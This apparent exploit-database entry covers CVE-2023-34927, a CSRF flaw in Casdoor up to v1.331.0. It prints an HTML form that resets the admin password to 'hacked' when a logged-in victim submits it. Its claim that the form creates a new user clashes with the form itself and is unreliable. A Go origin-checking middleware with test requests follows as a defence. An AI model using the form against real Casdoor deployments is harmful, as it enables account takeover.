Casdoor < v1.331.0 Exploit, '/api/set-password' CSRF

# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
# Application: Casdoor
# Version: <= 1.331.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen
# Vendor Homepage:
# Software Link:
# Tested on: Windows
# CVE : CVE-2023-34927

Casdoor v1.331.0 and below contains a Cross-Site Request Forgery (CSRF) vulnerability in the /api/set-password endpoint.
This vulnerability allows an attacker to arbitrarily change a victim user's password by supplying a crafted URL.

Proof of Concept

The form below makes an unauthorized request to /api/set-password that bypasses the old password entry authentication step:

<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built-in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>history.pushState('', '', '/');</script>


If a user is logged in to the Casdoor web app at the time of execution, a new user will be created in the app with the following credentials:

userOwner: built-in
userName: admin
newPassword: hacked
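
On the defensive side, the cross-site form POST shown above can be rejected before it reaches the handler by checking the browser-supplied Origin (or Referer) on state-changing requests. The Go middleware below is an added example, not Casdoor's code or its actual fix; `trustedOrigins`, `sameOriginOnly` and `statusFor` are hypothetical names, and the allow-list and request body are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Assumed allow-list: the origin the application itself is served from.
var trustedOrigins = map[string]bool{"http://localhost:8000": true}

// requestOrigin returns scheme://host from Origin, falling back to Referer.
func requestOrigin(r *http.Request) string {
	src := r.Header.Get("Origin")
	if src == "" {
		src = r.Header.Get("Referer")
	}
	u, err := url.Parse(src)
	if err != nil || u.Scheme == "" || u.Host == "" {
		return "" // missing, "null" or malformed: treated as untrusted
	}
	return u.Scheme + "://" + u.Host
}

// sameOriginOnly blocks non-safe methods that are cross-site or lack a trusted origin.
func sameOriginOnly(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		safe := r.Method == http.MethodGet || r.Method == http.MethodHead || r.Method == http.MethodOptions
		if !safe && (r.Header.Get("Sec-Fetch-Site") == "cross-site" || !trustedOrigins[requestOrigin(r)]) {
			http.Error(w, "cross-origin request rejected", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// statusFor sends a constructed form POST to /api/set-password with the given Origin.
func statusFor(origin string) int {
	form := strings.NewReader("userOwner=built-in&userName=admin&newPassword=placeholder")
	req := httptest.NewRequest(http.MethodPost, "/api/set-password", form)
	req.Header.Set("Origin", origin)
	rec := httptest.NewRecorder()
	sameOriginOnly(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {})).ServeHTTP(rec, req)
	return rec.Code
}

func main() { fmt.Println(statusFor("http://localhost:8000"), statusFor("http://attacker.example"), statusFor("")) }
```

An origin check is one layer; SameSite session cookies and requiring the current password for a password change address the same request from other angles.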
